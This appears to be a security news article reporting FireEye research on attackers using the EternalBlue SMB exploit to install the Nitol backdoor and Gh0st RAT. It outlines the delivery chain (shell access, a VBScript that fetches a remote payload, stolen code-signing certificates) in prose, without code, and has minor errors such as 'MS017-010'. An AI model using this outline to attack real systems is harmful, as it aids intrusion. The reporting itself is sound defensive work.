The now-infamous EternalBlue exploit deployed in the WannaCry ransomware outbreak and in the distribution of the Adylkuzz miner is now being used to deliver the Nitol backdoor and Gh0st RAT. Both threats have been around for several years and are once again included in malicious operations.
The SMB Flaw from WannaCry and Adylkuzz Campaigns Deployed Once Again
FireEye researchers say that the criminals behind this campaign are once again using the very same SMB flaw (MS017-010) that was leveraged for the distribution of WannaCry.
“We observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,” FireEye researchers recently shared.
More about Gh0st RAT
As already mentioned, the RAT has been deployed in various malicious operations for many years. Interestingly, its primary use is as a nation-state tool for APT attacks against government agencies and politically-engaged targets. Gh0st RAT was also one of the backdoors searched for by Malware Hunter, the “specialized Shodan crawler that explores the Internet looking for command & control (C2s) servers for botnets”.
More about Backdoor.Nitol
Nitol, or Backdoor.Nitol has been part of operations built upon a remote code execution flaw using the ADODB.Stream ActiveX Object affecting older versions of Internet Explorer, FireEye researchers say. Interestingly, both Nitol and Gh0st have been distributed via the CVE-2014-6332 vulnerability and in spam campaigns targeting PowerShell commands.
The initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have been seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server.
Gh0st RAT Sample Signed with Stolen Certificate
According to researchers, the combination of EternalBlue and VBScript has been spreading Nitol in Singapore and Nitol in South Asia. Also, the samples acquired by FireEye were signed with a common digital certificate which is most likely stolen:
The Gh0St RAT sample observed in this attack, as well as other associated samples identified by FireEye are all signed with a common digital certificate purporting to be from 北京研创达科技有限公司 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.
In conclusion, the addition of EternalBlue to Metasploit has made things very easy for attackers to exploit these flaws. Researchers expect more threat groups to start leveraging the same vulnerabilities to deliver different payloads.